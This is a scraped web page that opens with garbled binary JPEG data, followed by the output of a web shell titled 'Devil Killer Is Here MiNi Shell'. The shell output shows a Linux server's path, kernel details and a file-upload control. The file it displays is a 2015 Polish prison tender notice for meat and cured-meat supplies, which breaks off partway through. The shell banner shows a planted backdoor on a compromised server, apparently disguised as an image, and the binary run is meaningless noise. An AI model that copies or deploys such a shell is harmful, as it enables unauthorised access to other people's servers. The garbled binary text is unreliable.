JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151009/147867-N-2015.html

<p class="kh_header"><b>Grudziądz: Dostawy mięsa i wędlin  dla Zakładu Karnego Nr 1 w Grudziądzu</b><br>
<b>Numer ogłoszenia: 147867 - 2015; data zamieszczenia: 09.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny Nr 1 , ul. Wybickiego 10/22, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 64 40 400, faks 56 64 40 499.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakłąd karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy mięsa i wędlin  dla Zakładu Karnego Nr 1 w Grudziądzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1
Mięso:

Lp.	Nazwa artykułu		Norma	Ilość
1.	Boczek surowy:
bez żeberek i bez skóry, powierzchnia czysta,  zapach charakterystyczny dla danego asortymentu, niedopuszczalny jest zapach świadczący o nieświeżości lub inny obcy		PN-A-82022	350 kg
2.	Boczek wędzony:
bez żeberek i bez skóry, powierzchnia czysta; smak i zapach charakterystyczny dla danego asortymentu, wyczuwalny smak wędzenia, niedopuszczalny jest smak i zapach świadczący 
o nieświeżości lub inny obcy;
konsystencja: wilgotna, niedopuszczalne skupiska galarety oraz wyciek soku; 
barwa: charakterystyczna dla wędzonek.		PN-A-82007	10 kg
3.	Schab wieprzowy b/k:
część zasadnicza wieprzowiny - odcięta od półtuszy z odcinka piersiowo-lędźwiowego w liniach; gruby, jednolity, soczysty mięsień otoczony błoną i niewielką ilością tłuszczu;
barwa ciemnoróżowa, zapach - swoisty, charakterystyczny dla każdego rodzaju mięsa, konsystencja-jędrna, elastyczna.		PN-86/A-82002	650 kg
4.	Mięso mielone wieprzowe:
mięso czyste, bez śladów zanieczyszczeń,bez ścięgien, skór i kości, zapach swoisty charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego sie psucia;		PN-A-82002:1986	8 500 kg
5.	Mięso mielone wołowe:
mięso czyste, bez śladów zanieczyszczeń,bez ścięgien, skór i kości, zapach swoisty charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia;		PN-A-82003:1988	2 500 kg
6.	Karkówka wieprzowa b/k:
część zasadnicza wieprzowiny, odcięta z odcinka szyjnego półtuszy, odcięta w linii oddzielenia głowy(z przodu), świeże o barwie jasnoczerwonej z niewielkimi przerostami tkanki tłuszczowej, mięso czyste, bez śladów zanieczyszczeń, zapach swoisty charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia;		PN-86/A-82002	200 kg
7.	Wątroba wieprzowa:
bez śladów zanieczyszczeń, zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-86/A-82004	3 800 kg
8.	Mięso gulaszowe wieprzowe;
bez śladów zanieczyszczeń, zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-88/A-82003	600 kg
9.	Mięso gulaszowe wołowe:
bez śladów zanieczyszczeń, zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-86/A-82002	1 500 kg
10.	Szynka wieprzowa b/k:
bez śladów zanieczyszczeń, zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-65-A-8200	650 kg

Część 2
Drób :

Lp.	Nazwa artykułu	CPV	Norma	Ilość
1.	Ćwiartki z kurczaka świeże:
bez śladów zanieczyszczeń, zapach 
swoisty charakterystyczny dla danego
 asortymentu, bez oznak rozpoczynającego się psucia;	PN-A-86524	9 000 kg


Część 3
Wędliny wieprzowe:

Lp.	Nazwa artykułu	CPV	Norma	Ilość
1.	Kaszanka:
- wyrób podrobowy wieprzowy parzony
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-82007	3 700 kg
2.	Kiełbasa biała parzona:
- kiełbasa średnio rozdrobniona parzona
- skład: mięso wieprzowe min. 70%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	1 800 kg
3.	Kiełbasa dębicka:
- kiełbasa średnio rozdrobniona parzona,
- skład: mięso wieprzowe min. 55%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-V-74028	1 800 kg
4.	Kiełbasa janowiecka:
- kiełbasa średnio rozdrobniona wieprzowo-drobiowa parzona,
- skład: mięso wieprzowe min. 55%
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	2 200 kg
5.	Kiełbasa jarmarczna:
- kiełbasa średnio rozdrobniona wieprzowo-drobiowa wędzona, parzona,
- skład: mięso wieprzowe min. 55%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	5 600 kg
6.	Kiełbasa krakowska parzona:
- kiełbasa średnio rozdrobniona wieprzowo-drobiowa wędzona, parzona,
- skład: mięso wieprzowe min. 60%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	500 kg
7.	Mortadela:
- kiełbasa  wieprzowo-drobiowa parzona,
- skład: mięso wieprzowe min. 50%, 
- mięso drobiowe min. 10%
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	1 600 kg
8.	Kiełbasa parówkowa:
- skład: mięso wieprzowe min. 50%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	2 500 kg
9.	Kiełbasa piwna:
- kiełbasa średnio rozdrobniona wędzona, parzona,
- skład: mięso wieprzowe min. 55%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	3 500 kg
10.	Kiełbasa szynkowa wieprzowa:
- kiełbasa grubo rozdrobniona wieprzowa parzona,
- skład: mięso wieprzowe min. 55%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	1 000 kg
11.	

Kiełbasa śląska:
- kiełbasa średnio rozdrobniona wędzona, parzona,
- skład: mięso wieprzowe min. 55%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
	PN-V-74028	1 800 kg
12.	Kiełbasa zwyczajna:
- kiełbasa średnio rozdrobniona wieprzowo-drobiowa wędzona, parzona,
- skład: mięso wieprzowe min. 55%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
		PN-V-74028	3 000 kg
13.	Kiełbasa żywiecka:
- kiełbasa średnio rozdrobniona wędzona, parzona,
- skład: mięso wieprzowe min. 60%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
		PN-V-74028	300 kg
14.	Metka:
- kiełbasa drobno rozdrobniona,
- skład: mięso wieprzowe min. 50%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
	PN-A-82007	2 200 kg
15.	Parówki cielęce:
- typu cielaczki
- wyrób homogenizowany
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-A-82022	2 100 kg
16.	Parówki cienkie:
- skład: mięso wieprzowe min. 50%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
		PN-V-74028	1 800 kg
17.	Pasztetowa wieprzowa:
- wyrób podrobowy wieprzowy parzony,
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
		PN-A-82007	3 000 kg
18.	Salceson czarny:
- wyrób podrobowy wieprzowy, parzony,
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
		PN-A-82007	1 500 kg
19.	Salceson biały:
- wyrób podrobowy wieprzowy, parzony,
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-82007	1 500 kg
20.	Kiełbasa serdelowa:
- skład: mięso wieprzowe min. 50%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	2 000 kg
21.	Szynka mielona:
- kiełbasa drobno rozdrobniona,
- skład: mięso wieprzowe min. 45%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	3 100 kg
Część 4
Wędliny drobiowe:

Lp.	Nazwa artykułu	CPV	Norma	Ilość
1.	Baton lub blok szynkowy z indyka:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	1 200 kg
2.	Biała drobiowa parzona:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	800 kg
3.	Kiełbasa szynkowa z drobiu:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	800 kg
4.	Parówki cienkie drobiowe:
- drobno rozdrobnione,
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	2 300 kg
5.	Polędwica drobiowa:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	2 300 kg
6.	Pierś gotowana z drobiu:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	800 kg
7.	Szynka z indyka:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	800 kg
8.	Szynka drobiowa;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	800 kg
9.	Polędwica miodowa z drobiu:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	1 200 kg.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.12.20-3, 15.11.30.00-3, 15.13.14.00-9, 15.13.16.20-7, 15.11.40.00-0, 15.11.10.00-9, 15.11.30.00-4, 15.11.21.00-7, 15.13.11.34-3, 15.13.11.33-5, 15.13.13.10-1, 15.13.11.35-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wyłącznie dla części 3 i części 4 próbki oferowanych wędlin (każdej z podanego asortymentu o wadze nie mniejszej niż 0,2 kg), hermetycznie zapakowane, z oznaczeniem każdej próbki nazwą oferowanej wędliny wraz z załączoną informacją dotyczącą składników oferowanej wędliny oraz nazwą Wykonawcy, Pełnomocnictwo osoby/osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynikają z przepisów prawa lub innych dokumentów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl-zamówienia publiczne-OISW w Bydgoszczy-Zakład Karny Nr1 w Grudziądzu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Nr1 ul. Wybickiego 10/22, 86-300 Grudziądz -Dzial Kwatermistrzowski..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2015 godzina 11:30, miejsce: Zakład Karny Nr1 ul. Wybickiego 10/22, 86-300 Grudziądz-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso:

Lp.	Nazwa artykułu		Norma	Ilość
1.	Boczek surowy:
bez żeberek i bez skóry, powierzchnia czysta,  zapach charakterystyczny dla danego asortymentu, niedopuszczalny jest zapach świadczący o nieświeżości lub inny obcy	PN-A-82022	350 kg
2.	Boczek wędzony:
bez żeberek i bez skóry, powierzchnia czysta; smak i zapach charakterystyczny dla danego asortymentu, wyczuwalny smak wędzenia, niedopuszczalny jest smak i zapach świadczący 
o nieświeżości lub inny obcy;
konsystencja: wilgotna, niedopuszczalne skupiska galarety oraz wyciek soku; 
barwa: charakterystyczna dla wędzonek.	PN-A-82007	10 kg
3.	Schab wieprzowy b/k:
część zasadnicza wieprzowiny - odcięta od półtuszy z odcinka piersiowo-lędźwiowego w liniach; gruby, jednolity, soczysty mięsień otoczony błoną i niewielką ilością tłuszczu;
barwa ciemnoróżowa, zapach - swoisty, charakterystyczny dla każdego rodzaju mięsa, konsystencja-jędrna, elastyczna.		PN-86/A-82002	650 kg
4.	Mięso mielone wieprzowe:
mięso czyste, bez śladów zanieczyszczeń,bez ścięgien, skór i kości, zapach swoisty charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego sie psucia;		PN-A-82002:1986	8 500 kg
5.	Mięso mielone wołowe:
mięso czyste, bez śladów zanieczyszczeń,bez ścięgien, skór i kości, zapach swoisty charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia;		PN-A-82003:1988	2 500 kg
6.	Karkówka wieprzowa b/k:
część zasadnicza wieprzowiny, odcięta z odcinka szyjnego półtuszy, odcięta w linii oddzielenia głowy(z przodu), świeże o barwie jasnoczerwonej z niewielkimi przerostami tkanki tłuszczowej, mięso czyste, bez śladów zanieczyszczeń, zapach swoisty charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia;		PN-86/A-82002	200 kg
7.	Wątroba wieprzowa:
bez śladów zanieczyszczeń, zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-86/A-82004	3 800 kg
8.	Mięso gulaszowe wieprzowe;
bez śladów zanieczyszczeń, zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-88/A-82003	600 kg
9.	Mięso gulaszowe wołowe:
bez śladów zanieczyszczeń, zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-86/A-82002	1 500 kg
10.	Szynka wieprzowa b/k:
bez śladów zanieczyszczeń, zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-65-A-8200	650 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.12.20-3, 15.11.30.00-3, 15.13.14.00-9, 15.13.16.20-7, 15.11.40.00-0, 15.11.10.00-9, 15.11.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin płatności - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drób.</p>
